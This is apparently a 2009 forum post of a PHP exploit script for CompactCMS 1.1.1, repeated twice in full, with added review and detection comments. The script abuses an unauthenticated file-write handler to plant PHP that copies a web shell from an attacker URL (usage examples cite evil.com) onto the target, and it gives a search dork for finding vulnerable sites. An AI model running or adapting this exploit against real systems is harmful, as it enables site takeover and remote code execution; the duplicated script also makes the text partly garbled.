Dimi4
09.04.2009, 09:25
CompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
<?php
/**
* @Product: MMIX - CompactCMS
* @Version: 1.1.1
* @Site: CompactCMS.nl
* @Dork: "© 2009 CompactCMS"
* @Found by: Dimi4
* @Date: 8.04.2009
* @Greetz: antichat, UASC[http://uasc.org.ua]
* @Bug Function [admin\handler.inc.php] [50-62 lines] :
* */
/////////////////////////////////////////////////////////////////////
## $name = htmlentities($_GET['file']); #
## $content = $_POST['content']; #
## $filename = "../content/".htmlentities($_GET['file']).".php"; #
## #
## if (is_writable($filename)) { #
## if (!$handle = fopen($filename, 'w')) { #
## echo "[ERR105] ".$sw_err02." (".$filename.")."; #
## exit; #
## } #
## if (fwrite($handle, $content) === FALSE) { #
## echo "[ERR106] ".$sw_err03." (".$filename.")."; #
## exit; #
## } #
////////////////////////////////////////////////////////////////////
// Silences every notice and warning. The script relies on this: $payload,
// $response and $warning are appended to or read before they are ever
// assigned, which would otherwise print "Undefined variable" notices.
error_reporting(0);
// Lifts the execution time limit so the blocking socket read in http_send()
// can wait for the server to close the connection.
set_time_limit(0);
/**
 * Opens a raw TCP connection to $host on port 80, writes $packet verbatim
 * and returns whatever is read back until the peer stops sending.
 *
 * @param string $host   host name or address handed to socket_connect()
 * @param string $packet complete HTTP request text (request line, headers, body)
 * @return string|null   raw response bytes; null when nothing was read,
 *                       because $response is never initialised
 */
function http_send($host, $packet)
{
// NOTE(review): socket_create() returns false on failure, so $s is not a
// valid error code for socket_strerror() here; socket_last_error() is what
// the connect branch below uses.
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
// Port is hard-coded: plain HTTP only, no TLS.
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
// Return value of socket_write() is ignored, so a short write goes unnoticed.
socket_write($s, $packet, strlen($packet));
// Loops until socket_read() returns false or an empty string, i.e. relies on
// the server closing the connection (the caller sends HTTP/1.0).
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
/**
 * Prints the command-line usage (positional arguments: host, path, URL of
 * the file to fetch, and optionally an HTTP Basic login and password) and
 * terminates the script.
 */
function help()
{
// $argv is read from the global scope to show the script's own name.
global $argv;
echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
die();
}
// Only argv[1] is validated (loose comparison against ""); argv[2..5] are
// read unchecked and silently become null when absent (notices are off).
if ($argv[1] == "") {
help();
die();
}
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];
// Both file names the request leaves on the target are fixed strings, which
// makes them useful indicators when auditing a CompactCMS install:
// content/1123.php (created by the handler) and manpage.php (created by it).
$tmpshell = "1123";
$shellname = "manpage.php";
// Form body for admin/handler.inc.php. The vulnerable code quoted in the
// header writes $_POST['content'] unmodified into ../content/<file>.php, so
// this body is stored as executable PHP. The literal "<?php copy(" in a form
// body is a strong detection string for WAF/log review. $payload is appended
// to here without ever being initialised.
// Defensive note: htmlentities() on $_GET['file'] is an HTML-output encoder,
// not a filename validator; the fix is to authorise the request and restrict
// "file" to an allow-list of known page names rather than to encode it.
$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";
echo("
------------------------------------------------------------------
\tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");
// Absolute-URI HTTP/1.0 POST straight to the vulnerable handler, with the
// target file name in the "file" query parameter. The misspelled "prama"
// header and the bare "\n\n" header terminator are distinctive artifacts of
// this script in access logs and packet captures.
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
// Basic auth header is added only when both values are present; empty()
// also treats the literal string "0" as absent.
if(!empty($login) && !empty($pass))
{
$packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
// Length covers the body including its trailing CRLF CRLF.
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;
$response = http_send($host, $packet);
//echo ($response);
// An authentication challenge is the only failure that is recognised; any
// other response, including 404 or 500, falls through to the success branch.
if (preg_match("/WWW-Authenticate/i", $response))
{
die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
}
else
{
// Both messages are printed after the request has already been sent.
echo ("[+] Sending Payload...\n");
echo ("[+] Downloading shell...\n");
// Fetches argv[3] from the local machine purely to warn when it is
// unreachable; the content is discarded.
if(!file_get_contents($shell))
{
echo ("\t[!] Warning! Can't Download shell!\n");
$warning = "Maybe";
}
// $warning is undefined (prints as empty) unless the fetch above failed.
echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
die();
}
?>
<?php
/**
* @Product: MMIX - CompactCMS
* @Version: 1.1.1
* @Site: CompactCMS.nl
* @Dork: "© 2009 CompactCMS"
* @Found by: Dimi4
* @Date: 8.04.2009
* @Greetz: antichat, UASC[http://uasc.org.ua]
* @Bug Function [admin\handler.inc.php] [50-62 lines] :
* */
/////////////////////////////////////////////////////////////////////
## $name = htmlentities($_GET['file']); #
## $content = $_POST['content']; #
## $filename = "../content/".htmlentities($_GET['file']).".php"; #
## #
## if (is_writable($filename)) { #
## if (!$handle = fopen($filename, 'w')) { #
## echo "[ERR105] ".$sw_err02." (".$filename.")."; #
## exit; #
## } #
## if (fwrite($handle, $content) === FALSE) { #
## echo "[ERR106] ".$sw_err03." (".$filename.")."; #
## exit; #
## } #
////////////////////////////////////////////////////////////////////
// Silences every notice and warning. The script relies on this: $payload,
// $response and $warning are appended to or read before they are ever
// assigned, which would otherwise print "Undefined variable" notices.
error_reporting(0);
// Lifts the execution time limit so the blocking socket read in http_send()
// can wait for the server to close the connection.
set_time_limit(0);
/**
 * Opens a raw TCP connection to $host on port 80, writes $packet verbatim
 * and returns whatever is read back until the peer stops sending.
 *
 * @param string $host   host name or address handed to socket_connect()
 * @param string $packet complete HTTP request text (request line, headers, body)
 * @return string|null   raw response bytes; null when nothing was read,
 *                       because $response is never initialised
 */
function http_send($host, $packet)
{
// NOTE(review): socket_create() returns false on failure, so $s is not a
// valid error code for socket_strerror() here; socket_last_error() is what
// the connect branch below uses.
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
// Port is hard-coded: plain HTTP only, no TLS.
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
// Return value of socket_write() is ignored, so a short write goes unnoticed.
socket_write($s, $packet, strlen($packet));
// Loops until socket_read() returns false or an empty string, i.e. relies on
// the server closing the connection (the caller sends HTTP/1.0).
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
/**
 * Prints the command-line usage (positional arguments: host, path, URL of
 * the file to fetch, and optionally an HTTP Basic login and password) and
 * terminates the script.
 */
function help()
{
// $argv is read from the global scope to show the script's own name.
global $argv;
echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
die();
}
// Only argv[1] is validated (loose comparison against ""); argv[2..5] are
// read unchecked and silently become null when absent (notices are off).
if ($argv[1] == "") {
help();
die();
}
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];
// Both file names the request leaves on the target are fixed strings, which
// makes them useful indicators when auditing a CompactCMS install:
// content/1123.php (created by the handler) and manpage.php (created by it).
$tmpshell = "1123";
$shellname = "manpage.php";
// Form body for admin/handler.inc.php. The vulnerable code quoted in the
// header writes $_POST['content'] unmodified into ../content/<file>.php, so
// this body is stored as executable PHP. The literal "<?php copy(" in a form
// body is a strong detection string for WAF/log review. $payload is appended
// to here without ever being initialised.
// Defensive note: htmlentities() on $_GET['file'] is an HTML-output encoder,
// not a filename validator; the fix is to authorise the request and restrict
// "file" to an allow-list of known page names rather than to encode it.
$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";
echo("
------------------------------------------------------------------
\tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");
// Absolute-URI HTTP/1.0 POST straight to the vulnerable handler, with the
// target file name in the "file" query parameter. The misspelled "prama"
// header and the bare "\n\n" header terminator are distinctive artifacts of
// this script in access logs and packet captures.
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
// Basic auth header is added only when both values are present; empty()
// also treats the literal string "0" as absent.
if(!empty($login) && !empty($pass))
{
$packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
// Length covers the body including its trailing CRLF CRLF.
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;
$response = http_send($host, $packet);
//echo ($response);
// An authentication challenge is the only failure that is recognised; any
// other response, including 404 or 500, falls through to the success branch.
if (preg_match("/WWW-Authenticate/i", $response))
{
die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
}
else
{
// Both messages are printed after the request has already been sent.
echo ("[+] Sending Payload...\n");
echo ("[+] Downloading shell...\n");
// Fetches argv[3] from the local machine purely to warn when it is
// unreachable; the content is discarded.
if(!file_get_contents($shell))
{
echo ("\t[!] Warning! Can't Download shell!\n");
$warning = "Maybe";
}
// $warning is undefined (prints as empty) unless the fetch above failed.
echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
die();
}
?>